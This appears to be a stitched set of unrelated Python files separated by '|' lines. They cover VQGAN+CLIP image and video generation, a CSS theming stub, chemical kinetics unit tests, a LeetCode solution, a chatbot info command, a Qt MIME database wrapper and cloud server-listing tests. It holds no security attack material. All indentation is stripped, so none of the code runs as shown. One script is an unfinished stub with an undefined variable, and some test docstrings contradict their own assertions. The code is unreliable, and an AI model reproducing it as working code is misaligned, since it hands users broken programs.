# perceptor.visual.positional_embedding.data = clock/clock.max()
# perceptor.visual.positional_embedding.data=clamp_with_grad(clock,0,1)
cut_size = perceptor.visual.input_resolution
f = 2**(model.decoder.num_resolutions - 1)
# Cutout class options:
# 'latest','original','updated' or 'updatedpooling'
if args.cut_method == 'latest':
make_cutouts = MakeCutouts(args, cut_size, args.cutn, cut_pow=args.cut_pow)
elif args.cut_method == 'original':
make_cutouts = MakeCutoutsOrig(args, cut_size, args.cutn, cut_pow=args.cut_pow)
elif args.cut_method == 'updated':
make_cutouts = MakeCutoutsUpdate(args, cut_size, args.cutn, cut_pow=args.cut_pow)
elif args.cut_method == 'nrupdated':
make_cutouts = MakeCutoutsNRUpdate(args, cut_size, args.cutn, cut_pow=args.cut_pow)
else:
make_cutouts = MakeCutoutsPoolingUpdate(args, cut_size, args.cutn, cut_pow=args.cut_pow)
toksX, toksY = size[0] // f, size[1] // f
sideX, sideY = toksX * f, toksY * f
# Gumbel or not?
if gumbel:
e_dim = 256
n_toks = model.quantize.n_embed
z_min = model.quantize.embed.weight.min(dim=0).values[None, :, None, None]
z_max = model.quantize.embed.weight.max(dim=0).values[None, :, None, None]
else:
e_dim = model.quantize.e_dim
n_toks = model.quantize.n_e
z_min = model.quantize.embedding.weight.min(dim=0).values[None, :, None, None]
z_max = model.quantize.embedding.weight.max(dim=0).values[None, :, None, None]
if args.init_image:
if 'http' in args.init_image:
img = Image.open(urlopen(args.init_image))
else:
img = Image.open(args.init_image)
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
elif args.init_noise == 'pixels':
img = random_noise_image(size[0], size[1])
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
elif args.init_noise == 'gradient':
img = random_gradient_image(size[0], size[1])
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
else:
one_hot = F.one_hot(torch.randint(n_toks, [toksY * toksX], device=device), n_toks).float()
# z = one_hot @ model.quantize.embedding.weight
if gumbel:
z = one_hot @ model.quantize.embed.weight
else:
z = one_hot @ model.quantize.embedding.weight
z = z.view([-1, toksY, toksX, e_dim]).permute(0, 3, 1, 2)
#z = torch.rand_like(z)*2 # NR: check
z_orig = z.clone()
z.requires_grad_(True)
pMs = []
normalize = transforms.Normalize(mean=[0.48145466, 0.4578275, 0.40821073],
std=[0.26862954, 0.26130258, 0.27577711])
# From imagenet - Which is better?
#normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
# std=[0.229, 0.224, 0.225])
# CLIP tokenize/encode
if prompts:
for prompt in prompts:
txt, weight, stop = split_prompt(prompt)
embed = perceptor.encode_text(clip.tokenize(txt).to(device)).float()
pMs.append(Prompt(embed, weight, stop).to(device))
for prompt in args.image_prompts:
path, weight, stop = split_prompt(prompt)
img = Image.open(path)
pil_image = img.convert('RGB')
img = resize_image(pil_image, (sideX, sideY))
batch = make_cutouts(TF.to_tensor(img).unsqueeze(0).to(device))
embed = perceptor.encode_image(normalize(batch)).float()
pMs.append(Prompt(embed, weight, stop).to(device))
for seed, weight in zip(args.noise_prompt_seeds, args.noise_prompt_weights):
gen = torch.Generator().manual_seed(seed)
embed = torch.empty([1, perceptor.visual.output_dim]).normal_(generator=gen)
pMs.append(Prompt(embed, weight).to(device))
# Set the optimiser
opt = get_opt(args.optimiser, args.step_size, z)
# Output for the user
print('Using device:', device)
print('Optimising using:', args.optimiser)
if prompts:
print('Using text prompts:', prompts)
if args.image_prompts:
print('Using image prompts:', args.image_prompts)
if args.init_image:
print('Using initial image:', args.init_image)
if args.noise_prompt_weights:
print('Noise prompt weights:', args.noise_prompt_weights)
if args.seed is None:
seed = torch.seed()
else:
seed = args.seed
torch.manual_seed(seed)
print('Using seed:', seed)
i = 0 # Iteration counter
j = 0 # Zoom video frame counter
p = 1 # Phrase counter
smoother = 0 # Smoother counter
this_video_frame = 0 # for video styling
# Messing with learning rate / optimisers
#variable_lr = args.step_size
#optimiser_list = [['Adam',0.075],['AdamW',0.125],['Adagrad',0.2],['Adamax',0.125],['DiffGrad',0.075],['RAdam',0.125],['RMSprop',0.02]]
# Do it
try:
with tqdm() as pbar:
while True:
# Change generated image
if args.make_zoom_video:
if i % args.zoom_frequency == 0:
out = synth(z)
# Save image
img = np.array(out.mul(255).clamp(0, 255)[0].cpu().detach().numpy().astype(np.uint8))[:,:,:]
img = np.transpose(img, (1, 2, 0))
imageio.imwrite('./steps/' + str(j) + '.png', np.array(img))
# Time to start zooming?
if args.zoom_start <= i:
# Convert z back into a Pil image
#pil_image = TF.to_pil_image(out[0].cpu())
# Convert NP to Pil image
pil_image = Image.fromarray(np.array(img).astype('uint8'), 'RGB')
# Zoom
if args.zoom_scale != 1:
pil_image_zoom = zoom_at(pil_image, sideX/2, sideY/2, args.zoom_scale)
else:
pil_image_zoom = pil_image
# Shift - https://pillow.readthedocs.io/en/latest/reference/ImageChops.html
if args.zoom_shift_x or args.zoom_shift_y:
# This one wraps the image
pil_image_zoom = ImageChops.offset(pil_image_zoom, args.zoom_shift_x, args.zoom_shift_y)
# Convert image back to a tensor again
pil_tensor = TF.to_tensor(pil_image_zoom)
# Re-encode
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
z_orig = z.clone()
z.requires_grad_(True)
# Re-create optimiser
opt = get_opt(args.optimiser, args.step_size)
# Next
j += 1
# Change text prompt
if args.prompt_frequency > 0:
if i % args.prompt_frequency == 0 and i > 0:
# In case there aren't enough phrases, just loop
if p >= len(all_phrases):
p = 0
pMs = []
prompts = all_phrases[p]
# Show user we're changing prompt
print(prompts)
for prompt in prompts:
txt, weight, stop = split_prompt(prompt)
embed = perceptor.encode_text(clip.tokenize(txt).to(device)).float()
pMs.append(Prompt(embed, weight, stop).to(device))
'''
# Smooth test
smoother = args.zoom_frequency * 15 # smoothing over x frames
variable_lr = args.step_size * 0.25
opt = get_opt(args.optimiser, variable_lr)
'''
p += 1
'''
if smoother > 0:
if smoother == 1:
opt = get_opt(args.optimiser, args.step_size)
smoother -= 1
'''
'''
# Messing with learning rate / optimisers
if i % 225 == 0 and i > 0:
variable_optimiser_item = random.choice(optimiser_list)
variable_optimiser = variable_optimiser_item[0]
variable_lr = variable_optimiser_item[1]
opt = get_opt(variable_optimiser, variable_lr)
print("New opt: %s, lr= %f" %(variable_optimiser,variable_lr))
'''
# Training time
train(pMs, opt, i, z, model, perceptor, make_cutouts, normalize, z_min, z_max, save_every, args.init_weight, args.make_video, prompts, output_path, gumbel)
# Ready to stop yet?
if i == iterations:
if not args.video_style_dir:
# we're done
break
else:
if this_video_frame == (num_video_frames - 1):
# we're done
make_styled_video = True
break
else:
# Next video frame
this_video_frame += 1
# Reset the iteration count
i = -1
pbar.reset()
# Load the next frame, reset a few options - same filename, different directory
args.init_image = video_frame_list[this_video_frame]
print("Next frame: ", args.init_image)
if args.seed is None:
seed = torch.seed()
else:
seed = args.seed
torch.manual_seed(seed)
print("Seed: ", seed)
filename = os.path.basename(args.init_image)
output_path = os.path.join(cwd, "steps", filename)
# Load and resize image
img = Image.open(args.init_image)
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
# Re-encode
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
z_orig = z.clone()
z.requires_grad_(True)
# Re-create optimiser
opt = get_opt(args.optimiser, args.step_size)
i += 1
pbar.update()
except KeyboardInterrupt:
pass
# All done :)
# Video generation
if args.make_video or args.make_zoom_video:
init_frame = 1 # Initial video frame
if args.make_zoom_video:
last_frame = j
else:
last_frame = i # This will raise an error if that number of frames does not exist.
length = args.video_length # Desired time of the video in seconds
min_fps = 10
max_fps = 60
total_frames = last_frame-init_frame
frames = []
tqdm.write('Generating video...')
for i in range(init_frame,last_frame):
temp = Image.open("./steps/"+ str(i) +'.png')
keep = temp.copy()
frames.append(keep)
temp.close()
if args.output_video_fps > 9:
# Hardware encoding and video frame interpolation
print("Creating interpolated frames...")
ffmpeg_filter = f"minterpolate='mi_mode=mci:me=hexbs:me_mode=bidir:mc_mode=aobmc:vsbmc=1:mb_size=8:search_param=32:fps={args.output_video_fps}'"
output_file = re.compile('\.png$').sub('.mp4', output_path)
try:
p = Popen(['ffmpeg',
'-y',
'-f', 'image2pipe',
'-vcodec', 'png',
'-r', str(args.input_video_fps),
'-i',
'-',
'-b:v', '10M',
'-vcodec', 'h264_nvenc',
'-pix_fmt', 'yuv420p',
'-strict', '-2',
'-filter:v', f'{ffmpeg_filter}',
'-metadata', f'comment={prompts}',
output_file], stdin=PIPE)
except FileNotFoundError:
print("ffmpeg command failed - check your installation")
for im in tqdm(frames):
im.save(p.stdin, 'PNG')
p.stdin.close()
p.wait()
else:
# CPU
fps = np.clip(total_frames/length,min_fps,max_fps)
output_file = re.compile('\.png$').sub('.mp4', output_path)
try:
p = Popen(['ffmpeg',
'-y',
'-f', 'image2pipe',
'-vcodec', 'png',
'-r', str(fps),
'-i',
'-',
'-vcodec', 'libx264',
'-r', str(fps),
'-pix_fmt', 'yuv420p',
'-crf', '17',
'-preset', 'veryslow',
'-metadata', f'comment={prompts}',
output_file], stdin=PIPE)
except FileNotFoundError:
print("ffmpeg command failed - check your installation")
for im in tqdm(frames):
im.save(p.stdin, 'PNG')
p.stdin.close()
p.wait()
|
import sys, shutil
template_name = sys.argv[1]
shutil.copy('bootstrap_template.css', 'bootstrap_%s.css' % name)
f = open('bootstrap_%s.css' % name, 'r')
text = f.read()
f.close()
colors = '5B4634 82634A 9B7759 A88160 E8B285'.split()
NOT FINISHED...
# Use color scheme from http://kuler.adobe.com/
f = open('bootstrap_%s.css' % name, 'w')
f.write(text)
f.close()
|
#!/usr/bin/env python3
###############################################################################
# #
# RMG - Reaction Mechanism Generator #
# #
# Copyright (c) 2002-2019 Prof. William H. Green (whgreen@mit.edu), #
# Prof. Richard H. West (r.west@neu.edu) and the RMG Team (rmg_dev@mit.edu) #
# #
# Permission is hereby granted, free of charge, to any person obtaining a #
# copy of this software and associated documentation files (the 'Software'), #
# to deal in the Software without restriction, including without limitation #
# the rights to use, copy, modify, merge, publish, distribute, sublicense, #
# and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in #
# all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #
# DEALINGS IN THE SOFTWARE. #
# #
###############################################################################
import logging
import os.path
import shutil
import unittest
from rmgpy import settings
from rmgpy.data.kinetics.database import KineticsDatabase
from rmgpy.data.kinetics.family import TemplateReaction
from rmgpy.data.kinetics.library import LibraryReaction
from rmgpy.kinetics import Arrhenius, Troe, PDepArrhenius
from rmgpy.kinetics.model import PDepKineticsModel
###################################################
class TestLibrary(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
A function run ONCE before all unit tests in this class.
"""
# Set up a dummy database
cls.database = KineticsDatabase()
cls.database.load_libraries(
os.path.join(settings['test_data.directory'], 'testing_database', 'kinetics', 'libraries'),
libraries=None) # this loads all of them: ['GRI-Mech3.0', 'ethane-oxidation'])
cls.libraries = cls.database.libraries
def test_get_library_reactions(self):
"""
test that get_library_reactions loads reactions correctly
"""
lib_rxns = self.libraries['GRI-Mech3.0'].get_library_reactions()
for rxn in lib_rxns:
self.assertIsInstance(rxn, LibraryReaction)
lib_rxns = self.libraries['ethane-oxidation'].get_library_reactions() # should have no direct library reactions
for rxn in lib_rxns:
if isinstance(rxn.kinetics, PDepKineticsModel):
self.assertIsInstance(rxn, LibraryReaction) # can load pdep as networks yet so load as libraries
else:
self.assertIsInstance(rxn, TemplateReaction) # all reactions are template based
def test_save_library(self):
"""
This tests the the library.save method by writing a new temporary file and
loading it and comparing the original and copied reactions
"""
os.makedirs(os.path.join(settings['test_data.directory'],
'testing_database', 'kinetics', 'libraries', 'eth-oxcopy'))
try:
self.libraries['ethane-oxidation'].save(
os.path.join(settings['test_data.directory'],
'testing_database', 'kinetics', 'libraries', 'eth-oxcopy', 'reactions.py'))
self.database.load_libraries(
os.path.join(settings['test_data.directory'],
'testing_database', 'kinetics', 'libraries'),
libraries=None) # this loads all of them: ['GRI-Mech3.0', 'ethane-oxidation', 'eth-oxcopy'])
ori_rxns = self.database.libraries['ethane-oxidation'].get_library_reactions()
copy_rxns = self.database.libraries['eth-oxcopy'].get_library_reactions()
for i in range(len(ori_rxns)):
if repr(ori_rxns[i]).strip() != repr(copy_rxns[i]).strip():
self.assertIsInstance(copy_rxns[i], TemplateReaction)
finally:
shutil.rmtree(os.path.join(settings['test_data.directory'],
'testing_database', 'kinetics', 'libraries', 'eth-oxcopy'))
def test_generate_high_p_limit_kinetics(self):
"""
Test that a :class:Arrhenius kinetics object representing the high pressure limit rate
is returned from Troe/Lindmann/PDepArrhenius/Chebyshev kinetic classes
"""
lib_rxns = self.libraries['lib_net'].get_library_reactions()
for rxn in lib_rxns:
self.assertIsNone(rxn.network_kinetics)
logging.debug("Processing reaction {0}".format(rxn))
success = rxn.generate_high_p_limit_kinetics()
if (isinstance(rxn.kinetics, PDepArrhenius) and rxn.kinetics.pressures.value_si[-1] < 9000000) \
or not rxn.is_unimolecular():
# generate_high_p_limit_kinetics() should return `False` if the reaction is not unimolecular
# or if it is a PDepArrhenius or Chebyshev with Pmax < 90 bar
self.assertFalse(success)
else:
self.assertTrue(success)
if isinstance(rxn.kinetics, Arrhenius):
# If the library reaction is already an Arrhenius expression, network_kinetics isn't generated
self.assertIsNone(rxn.network_kinetics)
else:
self.assertTrue(isinstance(rxn.network_kinetics, Arrhenius))
if isinstance(rxn.kinetics, Troe):
# This block quantitative tests the "H + CH2 <=> CH3" reaction
# from the test library test_data/testing_database/kinetics/libraries/lib_net/reactions.py
# 1. Check that the T exponent in the modified Arrhenius (the "n") equals to 0
self.assertAlmostEqual(rxn.network_kinetics.n.value_si, 0)
# 2. Check that the pre-exponential factor equals to 6e+8 m^3/(mol*s)
self.assertAlmostEqual(int(rxn.network_kinetics.A.value_si), 6e+8)
|
# -*- coding: utf-8 -*-
# @Author: LC
# @Date: 2016-03-10 17:38:42
# @Last modified by: LC
# @Last Modified time: 2016-04-10 16:24:30
# @Email: liangchaowu5@gmail.com
class Solution(object):
def threeSumClosest(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
if len(nums) == 0:
return 0
nums.sort()
min = 1000000
for i in range(len(nums)-2):
j = i+1
k = len(nums)-1
while j<k:
sum = nums[i]+nums[j]+nums[k]
if sum > target:
gap = abs(sum -target)
if min>gap:
min = gap
result = sum
k-=1
elif sum < target:
gap = abs(target - sum)
if min > gap:
min = gap
result = sum
j+=1
else:
result = sum
return result
return result
|
import os # os.uname, os.getpid
import time # time.time
import datetime # datetime.timedelta
from ..handlers import CommandHandler
from ..dataclasses import Message
from .. import __version__
from .._i18n import _
# Example of a more sophisticated command
class InfoCommand(CommandHandler):
"""
Bot information command
This handler creates a command responding with information
about the bot. The command is by default called 'info',
but this can be changed with the `command` kwarg.
Sent information can be customized by the `options` kwarg.
Available options:
name stibium prefix user hostname pid uptime
"""
options = {
'name': True,
'stibium': True,
'prefix': True,
'user': True,
'hostname': False,
'pid': False,
'uptime': True,
'owner': True,
}
starttime = None
def __init__(self, command='info', options=None):
super().__init__(handler=None, command=command)
if options is not None:
for k, v in options.items():
if k in self.options:
self.options[k] = v
def setup(self, bot):
super().setup(bot)
self.starttime = time.time()
def _get_data(self, x, bot):
if x == 'name':
return bot.name
if x == 'stibium':
return _('running Stibium v{version}').format(version=__version__)
if x == 'prefix':
return _('Prefix: {prefix}').format(prefix=repr(bot.prefix))
if x == 'user':
uid = bot.fbchat_client.uid
username = bot.get_user_name(uid)
return _('Logged in as {username} ({uid})').format(username=username, uid=uid)
if x == 'hostname':
return _('Server: {hostname}').format(hostname=os.uname()[1])
if x == 'pid':
return _('PID: {pid}').format(pid=os.getpid())
if x == 'uptime':
return _('Uptime: {uptime}').format(
uptime=datetime.timedelta(seconds=int(time.time()-self.starttime))
)
if x == 'owner':
if bot.owner is None:
return _('Owner not set!')
return _('Owner: {username} ({uid})').format(
uid=bot.owner.id_,
username=bot.get_user_name(bot.owner.id_)
)
def handlerfn(self, message: Message, bot):
response = []
for k, v in self.options.items():
if v:
response.append(self._get_data(k, bot))
message.reply('\n'.join(response))
|
from Resources.resource_classes import ResourceClass
from Resources.resource_depart import ResourceDepart
from Resources.resource_students import ResourceStudent
class ResourceIn():
# 学院统一入口类
def get_depart(self):
return ResourceDepart()
# 班级统一入口类
def get_class(self):
return ResourceClass()
# 学生统一入口类
def get_student(self):
return ResourceStudent()
|
from __future__ import annotations
import os
from typing import Literal
from prettyqt import core
from prettyqt.utils import bidict, datatypes
MatchModeStr = Literal["default", "extension", "content"]
MATCH_MODE: bidict[MatchModeStr, core.QMimeDatabase.MatchMode] = bidict(
default=core.QMimeDatabase.MatchMode.MatchDefault,
extension=core.QMimeDatabase.MatchMode.MatchExtension,
content=core.QMimeDatabase.MatchMode.MatchContent,
)
class MimeDatabase(core.QMimeDatabase):
"""Maintains a database of MIME types."""
def get_mime_type_for_file(
self,
path: datatypes.PathType | core.QFileInfo,
match_mode: MatchModeStr | core.QMimeDatabase.MatchMode = "default",
) -> core.MimeType:
if isinstance(path, os.PathLike):
path = os.fspath(path)
mime_type = self.mimeTypeForFile(path, MATCH_MODE.get_enum_value(match_mode))
return core.MimeType(mime_type)
def get_mime_type_for_data(
self, data: datatypes.ByteArrayType | core.QIODevice
) -> core.MimeType:
return core.MimeType(self.mimeTypeForData(data))
def get_mime_type_for_filename_and_data(
self, filename: os.PathLike, data: datatypes.ByteArrayType | core.QIODevice
) -> core.MimeType:
path = os.fspath(filename)
return core.MimeType(self.mimeTypeForFileNameAndData(path, data))
def get_mime_type_for_name(self, name: str) -> core.MimeType:
return core.MimeType(self.mimeTypeForName(name))
def get_mime_type_for_url(self, url: core.QUrl | str) -> core.MimeType:
url = core.QUrl(url) if isinstance(url, str) else url
return core.MimeType(self.mimeTypeForUrl(url))
def get_mime_types_for_filename(
self, filename: datatypes.PathType
) -> list[core.MimeType]:
path = os.fspath(filename)
return [core.MimeType(i) for i in self.mimeTypesForFileName(path)]
if __name__ == "__main__":
db = MimeDatabase()
print(db.get_mime_type_for_file("C:/test.log"))
|
"""
Copyright 2016 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cloudcafe.compute.common.exceptions as exceptions
from cafe.drivers.unittest.decorators import tags
from cloudcafe.common.tools.datagen import rand_name
from cloudcafe.compute.common.types import NovaImageStatusTypes
from cloudcafe.compute.common.types import NovaServerStatusTypes
from cloudroast.compute.fixtures import ComputeFixture
class ServerListTest(ComputeFixture):
@classmethod
def setUpClass(cls):
"""
Perform actions that setup the necessary resources for testing.
The following resources are created during the setup
- Networking, default network from ComputeFixture
- 2 servers with the same configuration (waits for active)
- Image creation from first server (waits for active)
- 3rd server from image created in step above (waits for active)
"""
super(ServerListTest, cls).setUpClass()
networks = None
if cls.servers_config.default_network:
networks = [{'uuid': cls.servers_config.default_network}]
cls.name = rand_name("server")
first_response = cls.servers_client.create_server(
name=cls.name, image_ref=cls.image_ref,
flavor_ref=cls.flavor_ref, networks=networks).entity
cls.resources.add(first_response.id,
cls.servers_client.delete_server)
cls.name = rand_name("server")
second_response = cls.servers_client.create_server(
name=cls.name, image_ref=cls.image_ref,
flavor_ref=cls.flavor_ref, networks=networks).entity
cls.resources.add(second_response.id,
cls.servers_client.delete_server)
cls.server = cls.server_behaviors.wait_for_server_status(
first_response.id, NovaServerStatusTypes.ACTIVE).entity
cls.second_server = cls.server_behaviors.wait_for_server_status(
second_response.id, NovaServerStatusTypes.ACTIVE).entity
# Create a unique image
other_image_name = rand_name('image')
resp = cls.servers_client.create_image(
cls.second_server.id, other_image_name)
assert resp.status_code == 202
cls.other_image_id = cls.parse_image_id(resp)
cls.resources.add(cls.other_image_id, cls.images_client.delete_image)
cls.image_behaviors.wait_for_image_status(
cls.other_image_id, NovaImageStatusTypes.ACTIVE)
cls.name = rand_name("server")
third_response = cls.servers_client.create_server(
name=cls.name, image_ref=cls.other_image_id,
flavor_ref=cls.flavor_ref_alt, networks=networks).entity
cls.resources.add(third_response.id,
cls.servers_client.delete_server)
cls.third_server = cls.server_behaviors.wait_for_server_status(
third_response.id, NovaServerStatusTypes.ACTIVE).entity
@tags(type='smoke', net='no')
def test_get_server(self):
"""
Return the full details of a single server.
It will take the first server created in setup and pulls the server
details back; nothing is modified during this test.
The following assertions occur:
- 200 status code from http call.
- Server name matches config.
- Image id matches config.
- Flavor id matches config.
"""
server_info_response = self.servers_client.get_server(self.server.id)
server_info = server_info_response.entity
self.assertEqual(200, server_info_response.status_code)
self.assertEqual(self.server.name, server_info.name,
msg="Server name did not match")
self.assertEqual(self.image_ref, server_info.image.id,
msg="Image id did not match")
self.assertEqual(self.flavor_ref, server_info.flavor.id,
msg="Flavor id did not match")
@tags(type='smoke', net='no')
def test_list_servers(self):
"""
All 3 servers created in setup should be returned.
The following assertions occur:
- 200 status code from http call.
- Server 1,2 and 3 are in the list returned in the response.
"""
list_servers_response = self.servers_client.list_servers()
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), servers_list)
self.assertIn(self.second_server.min_details(), servers_list)
self.assertIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_all_tenants(self):
"""
Verify that all tenants cannot be retrieved using a non-admin account.
This will call the list_servers passing an integer value of 1 to the
all_tenants parameter. This should return a 403 response code.
The following assertions occur:
- The response code returned is not a 403
"""
all_tenants = 1
params = all_tenants
with self.assertRaises(exceptions.Forbidden):
self.servers_client.list_servers(all_tenants=params)
@tags(type='smoke', net='no')
def test_list_servers_with_detail(self):
"""
Details list of servers and verify they are in the list returned.
After the list_servers_with_details is called, it grabs the entity,
then iterates through the details and puts all the server ids into an
array which then will look for the server ids in the list.
The following assertions occur:
- 200 status code from the http call.
- Server 1 id is contained in the list.
- Server 2 id is contained in the list.
- Server 3 id is contained in the list.
"""
list_response = self.servers_client.list_servers_with_detail()
list_servers_detail = list_response.entity
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in list_servers_detail:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
self.assertIn(self.third_server.id, servers_list)
@tags(type='positive', net='no')
def test_list_server_details_using_marker(self):
"""
The list of servers should start from the provided marker (server id).
This gets all servers current in then compute instance with the call
list_serveris_with_details. Grabs the first item in the list, takes
the id and then calls the same list server with details with
parameters being the id of the first server it just returned to
ensure that the same server is not returned.
The following assertions occur:
- 200 status code from the http call.
- The first server returned is not in the new list of entities.
"""
list_response = self.servers_client.list_servers_with_detail()
list_server_detail = list_response.entity
first_server = list_server_detail[0]
# Verify the servers doesn't contain the server used as a marker
params = first_server.id
filtered_servers = self.servers_client.list_servers_with_detail(
marker=params)
self.assertEqual(200, filtered_servers.status_code)
self.assertNotIn(first_server, filtered_servers.entity)
@tags(type='positive', net='no')
def test_list_servers_using_marker(self):
"""
The list of servers should start from the provided marker (server id).
This gets all servers current in then compute instance with the call
list_servers. Grabs the first item in the list, takes the id and then
calls the same list server with details with parameters being the id
of the first server it just returned to ensure that the same server
is not returned.
The following assertions occur:
- 200 status code from the http call.
- The first server returned is not in the new list of entities.
"""
list_server_info_response = self.servers_client.list_servers()
list_server_info = list_server_info_response.entity
first_server = list_server_info[0]
# Verify the servers doesn't contain the server used as a marker
params = first_server.id
filtered_servers = self.servers_client.list_servers(
marker=params)
self.assertEqual(200, filtered_servers.status_code)
self.assertNotIn(first_server, filtered_servers.entity)
@tags(type='positive', net='no')
def test_list_server_with_detail_limit_results(self):
"""
Verify the expected number of servers (1) are returned.
This will call the list_servers_with_detail with a parameter of an
1 (integer) being passed into the limit param. This should return
only 1 entry in the list.
The following assertions occur:
- The len of the list returned is equal to the limit (1).
"""
limit = 1
params = limit
response = self.servers_client.list_servers_with_detail(limit=params)
servers = response.entity
self.assertEqual(
limit, len(response.entity),
msg="({0}) servers returned. Expected {1} servers.".format(
len(servers), limit))
@tags(type='positive', net='no')
def test_list_servers_with_detail_all_tenants(self):
"""
Verify that all tenants cannot be retrieved using a non-admin account.
This will call the list_servers_with_detail passing an integer value of
1 to the all_tenants parameter. This should return a 403 response code.
The following assertions occur:
- The response code returned is not a 403
"""
all_tenants = 1
params = all_tenants
with self.assertRaises(exceptions.Forbidden):
self.servers_client.list_servers_with_detail(all_tenants=params)
@tags(type='positive', net='no')
def test_list_servers_filter_by_image(self):
"""
Filter the list of servers by image that created the first 2 servers.
This will call the list_servers with the image which is the primary
image in the setup.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are in the list.
- Server 3 is NOT in the list.
"""
params = self.image_ref
list_servers_response = self.servers_client.list_servers(image=params)
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), servers_list)
self.assertIn(self.second_server.min_details(), servers_list)
self.assertNotIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_filter_by_flavor(self):
"""
Filter the list of servers by flavor that created the 3rd server.
This will call the list_servers with the alternate flavor that created
the third server.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are not in the list.
- Server 3 is in the list.
"""
params = self.flavor_ref_alt
list_servers_response = self.servers_client.list_servers(flavor=params)
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertNotIn(self.server.min_details(), servers_list)
self.assertNotIn(self.second_server.min_details(), servers_list)
self.assertIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_filter_by_server_name(self):
"""
Filter the list of servers by name, using server 1's name.
This will call the list_servers with the server name that was created
at startup.
The following assertions occur:
- 200 status code from the http call.
- Server 1 is in the list.
- Server 2 and 3 are not in the list.
"""
params = self.server.name
list_servers_response = self.servers_client.list_servers(name=params)
servers_list = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), servers_list)
self.assertNotIn(self.second_server.min_details(), servers_list)
self.assertNotIn(self.third_server.min_details(), servers_list)
@tags(type='positive', net='no')
def test_list_servers_filter_by_server_status(self):
"""
Filter the list of servers by server status of active.
This will call the list_servers with the status of active expecting
all servers to be returned.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3 are in the list.
"""
params = 'active'
list_servers_response = self.servers_client.list_servers(status=params)
list_servers = list_servers_response.entity
self.assertEqual(200, list_servers_response.status_code)
self.assertIn(self.server.min_details(), list_servers)
self.assertIn(self.second_server.min_details(), list_servers)
self.assertIn(self.third_server.min_details(), list_servers)
@tags(type='positive', net='no')
def test_list_servers_filter_by_changes_since(self):
"""
Filter the list of servers by changes-since.
This will call the list_servers with the expectation of all servers
being returned in the list. The list will be of all servers but will
go through then entries and pull the id into a list to compare against.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3's ids are in the generated list.
"""
params = self.server.created
servers = self.servers_client.list_servers(changes_since=params)
self.assertEqual(200, servers.status_code)
servers_ids_list = []
for i in servers.entity:
servers_ids_list.append(i.id)
self.assertIn(self.server.id, servers_ids_list)
self.assertIn(self.second_server.id, servers_ids_list)
self.assertIn(self.third_server.id, servers_ids_list)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_image(self):
"""
Filter the list of servers with details by image.
This will call the list_servers_with_detail with the image which is
the primary image in the setup.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are in the list.
- Server 3 is NOT in the list.
"""
params = self.image_ref
list_response = self.servers_client.list_servers_with_detail(
image=params)
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in list_response.entity:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
self.assertNotIn(self.third_server.id, servers_list)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_flavor(self):
"""
Filter the list of servers with details by flavor.
This will call the list_servers_with_detail with the alternate flavor
that created the third server.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are not in the list.
- Server 3 is in the list.
"""
params = self.flavor_ref_alt
list_response = self.servers_client.list_servers_with_detail(
flavor=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
self.assertNotIn(self.server, filtered_servers)
self.assertNotIn(self.second_server, filtered_servers)
